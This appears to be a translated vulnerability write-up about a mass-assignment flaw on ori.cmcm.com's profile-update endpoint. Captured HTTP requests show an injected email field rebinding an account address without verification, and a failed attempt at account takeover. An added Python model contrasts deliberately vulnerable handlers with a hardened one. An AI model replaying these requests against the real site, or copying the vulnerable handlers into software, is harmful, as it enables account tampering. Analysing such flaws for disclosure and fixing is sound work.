1. Open the URL: https://ori.cmcm.com/user/index.html
2. Click Save and capture the request. The captured packet is as follows:
POST /user/updateoneruserinfo.html HTTP/1.1
Host: ori.cmcm.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://ori.cmcm.com/user/index.html
Content-Length: 134
Cookie: [redacted]
Connection: close

skype=soory%2Cnull&timezone=Asia%2FShanghai&country=CN&surname=free&name=only&cm_token=ec622cd7baffb66839d657bd39d563c3211533098840827
Now fuzz the parameters a bit. After adding an email parameter that the form never sends, the packet looks like this (Content-Length recomputed for the longer body):
POST /user/updateoneruserinfo.html HTTP/1.1
Host: ori.cmcm.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://ori.cmcm.com/user/index.html
Content-Length: 157
Cookie: [redacted]
Connection: close

skype=soory%2Cnull&timezone=Asia%2FShanghai&country=CN&surname=free&name=only&cm_token=ec622cd7baffb66839d657bd39d563c3211533098840827&email=only_free@qq.com
OK, the server accepts the extra field and rebinds the address with no verification, so this is an arbitrary email binding. Next, let's try binding an email that already belongs to another user and see whether we can take over the account that owns it.
3. Register a new account with an email address, then log in.
4. On the 2017614104@qq.com account, change the email to 1900065568@qq.com.
Damn, there's a filter here: the server refuses an address that is already bound to another account.
Let's see whether it can be bypassed.
No luck, couldn't get past it. Painful. All I could do was submit it as an arbitrary email binding (crying.png).
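As an added example, not code from the original write-up or from cmcm, here is a minimal Python model of an update-profile handler that shows the three behaviours seen above: the mass assignment that let an unexpected email field rebind the address, the uniqueness check from step 4 that only refuses addresses already owned by another account, and an allow-listed handler that commits an email change only after a mailed token comes back. The in-memory user table, the cm_token placeholder and all handler names are constructed for illustration.

```python
# Added example, not code from the original write-up or from cmcm: a minimal
# model of an update-profile endpoint showing (1) the mass assignment that let
# an extra "email" field rebind the address, (2) the uniqueness check the author
# then ran into, which only blocks already-registered addresses, and (3) an
# allow-listed handler that commits email changes only after a mailed token
# comes back. The user table, the cm_token value and the handler names are
# constructed for illustration.
import secrets
from urllib.parse import parse_qs

# Constructed in-memory user table; the two addresses are the ones the page mentions.
USERS = {
    "attacker": {"skype": "", "timezone": "Asia/Shanghai", "country": "CN",
                 "surname": "", "name": "", "email": "2017614104@qq.com"},
    "victim":   {"skype": "", "timezone": "Asia/Shanghai", "country": "CN",
                 "surname": "", "name": "", "email": "1900065568@qq.com"},
}

# The fields the profile form actually edits, taken from the captured body.
PROFILE_FIELDS = {"skype", "timezone", "country", "surname", "name"}

# Pending email changes awaiting confirmation: token -> (user, new_email).
PENDING = {}

# Constructed request bodies mirroring the captured ones (cm_token is a placeholder).
CM_TOKEN = "cm_token=0123456789abcdef"
BODY_SAVE = ("skype=soory%2Cnull&timezone=Asia%2FShanghai&country=CN"
             "&surname=free&name=only&" + CM_TOKEN)
BODY_PLUS_EMAIL = BODY_SAVE + "&email=only_free@qq.com"       # the fuzzed request
BODY_VICTIM_EMAIL = BODY_SAVE + "&email=1900065568@qq.com"    # the takeover attempt


def parse_body(body):
    """Decode an application/x-www-form-urlencoded body into {field: value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def email_taken(email, except_user):
    """True if an account other than except_user already owns this address."""
    return any(p["email"] == email for u, p in USERS.items() if u != except_user)


def update_vulnerable(user, body):
    """Mass assignment: every posted field except cm_token lands in the profile,
    so an unexpected email= is accepted with no verification at all."""
    form = parse_body(body)
    form.pop("cm_token", None)
    USERS[user].update(form)
    return {"ok": True, "profile": dict(USERS[user])}


def update_with_uniqueness_filter(user, body):
    """Same mass assignment plus the filter the author hit: an address bound to
    another account is refused. Any unused address still binds unverified."""
    form = parse_body(body)
    form.pop("cm_token", None)
    if "email" in form and email_taken(form["email"], except_user=user):
        return {"ok": False, "error": "email already in use"}
    USERS[user].update(form)
    return {"ok": True, "profile": dict(USERS[user])}


def update_hardened(user, body):
    """Allow-list the editable fields. An email change is never applied here; it
    only creates a pending record, and the token is sent to the new address."""
    form = parse_body(body)
    USERS[user].update({k: v for k, v in form.items() if k in PROFILE_FIELDS})
    resp = {"ok": True, "profile": dict(USERS[user]), "pending_email": False}
    if "email" in form:
        token = secrets.token_urlsafe(32)
        PENDING[token] = (user, form["email"])   # deliver by email, never in resp
        resp["pending_email"] = True
    return resp


def confirm_email(token):
    """Commit a pending change when the mailed token comes back. Uniqueness is
    checked here rather than at request time, so the endpoint does not reveal
    which addresses are registered."""
    entry = PENDING.pop(token, None)
    if entry is None:
        return {"ok": False, "error": "invalid or used token"}
    user, new_email = entry
    if email_taken(new_email, except_user=user):
        return {"ok": False, "error": "email already in use"}
    USERS[user]["email"] = new_email
    return {"ok": True, "email": new_email}
```

Replaying the two captured bodies against `update_vulnerable` reproduces the finding (the extra email field is stored as-is), and `update_with_uniqueness_filter` reproduces the wall hit in step 4 while still accepting any unused address without proof of ownership. The hardened handler fixes both: unknown fields are dropped, and the address only changes through `confirm_email`, which is where the uniqueness check belongs so that the profile endpoint cannot be used to enumerate registered emails.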